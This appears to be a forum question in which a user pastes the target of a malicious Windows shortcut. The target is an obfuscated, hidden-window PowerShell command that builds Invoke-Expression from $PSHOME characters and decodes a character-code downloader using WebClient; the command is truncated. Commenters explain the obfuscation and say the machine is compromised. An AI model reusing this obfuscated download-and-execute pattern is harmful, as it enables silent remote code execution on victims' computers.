# Just ran a mystery windows shortcut file which has run a powershell script

Tags: powershell, shortcut

I just downloaded a file which was hidden as a shortcut to powershell. I'm not sure what code it has just executed as it looks cryptic. This is what the .lnk file target was configured to:

`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  & ( $PsHoME[21]+$PShOmE[34]+'X') (( '73-69%88-40j78P101P119z45U79-98U106%101-99s116r32-83P121P115j116x101x109r46x78U101-116z46j87z101x98x67j108U105-101P110j116D41x46r68U111s119`

It was set to start in:

`%SYSTEMROOT%\System32\WindowsPowerShell\v1.0`

Comment: [ps switches](https://learn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help)

Comment: Well this part `( $PsHoME[21]+$PShOmE[34]+'X')` means Invoke-Expression.

Comment: As @notjustme : `$pshome` is a variable, generally set to `C:\Windows\System32\WindowsPowerShell\v1.0` where `[n]` means take `n` character, giving `iex` which is short for `invoke-expression`

Comment: Essentially, your system just got compromised. Congratulations. Backup your data, then [format and reinstall](http://technet.microsoft.com/en-us/library/cc512587.aspx).